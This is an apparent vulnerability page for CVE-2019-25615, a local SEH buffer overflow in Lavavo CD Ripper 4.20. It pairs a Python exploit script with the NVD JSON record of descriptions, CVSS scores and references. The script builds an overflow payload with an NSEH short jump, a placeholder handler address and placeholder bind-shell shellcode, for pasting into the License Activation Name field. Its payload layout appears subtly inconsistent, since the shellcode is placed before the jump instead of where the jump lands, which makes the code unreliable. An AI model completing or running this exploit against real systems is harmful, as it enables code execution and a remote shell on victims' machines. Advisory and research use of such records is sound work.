CVE-2019-25615

#!/usr/bin/env python3 # PoC for CVE-2019-25615 - Lavavo CD Ripper SEH Buffer Overflow # This script generates a malicious string to trigger the overflow and bind shell on port 3110. import socket import sys # Configuration HOST = '127.0.0.1' # Target IP (Local) PORT = 3110 # Target Port for Bind Shell (as per description) # Payload structure # Offset to SEH (Example value, needs adjustment based on debugging) offset = 4108 # NSEH (Next SEH) - Short jump to skip SEH handler and land in shellcode # \xeb\x06 is JMP SHORT +6, \x90\x90 is NOP padding nseh = b"\xeb\x06\x90\x90" # SEH Handler - Address of POP POP RET instruction # This address is module specific and needs to be found for the target version seh = b"\x21\x21\x21\x21" # Placeholder address # Shellcode - msfvenom bind shell on port 3110 (Example) # windows/shell_bind_tcp LPORT=3110 shellcode = b"\x90\x90\x90\x90" # NOP sled shellcode += b"\xcc\xcc\xcc\xcc" # Int3 placeholder for actual shellcode padding = b"A" * (offset - len(shellcode)) # Construct the full payload payload = padding + shellcode + nseh + seh + b"C" * 500 print(f"[*] Generating payload with length: {len(payload)}") print(f"[*] Payload: {payload}") # Note: Since this is a local application input field vulnerability, # the payload would typically be pasted into the 'License Activation Name' field. # If the application listens on a port, use socket send. try: # Example of sending if it were a network service (Conceptual) # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # s.connect((HOST, 80)) # Assuming HTTP or specific app port # s.send(payload) # s.close() print("[+] Payload generated successfully. Paste into the vulnerable field.") except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2019-25615", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:30.117", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Lavavo CD Ripper 4.20 contains a structured exception handling (SEH) buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious string in the License Activation Name field. Attackers can craft a payload with controlled buffer data, NSEH jump instructions, and SEH handler addresses to trigger code execution and establish a bind shell on port 3110."}, {"lang": "es", "value": "Lavavo CD Ripper 4.20 contiene una vulnerabilidad de desbordamiento de búfer de manejo estructurado de excepciones (SEH) que permite a atacantes locales ejecutar código arbitrario al proporcionar una cadena maliciosa en el campo License Activation Name. Los atacantes pueden crear una carga útil con datos de búfer controlados, instrucciones de salto NSEH y direcciones de gestor SEH para desencadenar la ejecución de código y establecer un bind shell en el puerto 3110."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://lavavo-cd-ripper.jaleco.com/download", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46755", "source": "[email protected]"}, {"url": "https://www.lavavosoftware.com", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/lavavo-cd-ripper-local-seh-buffer-overflow", "source": "[email protected]"}]}}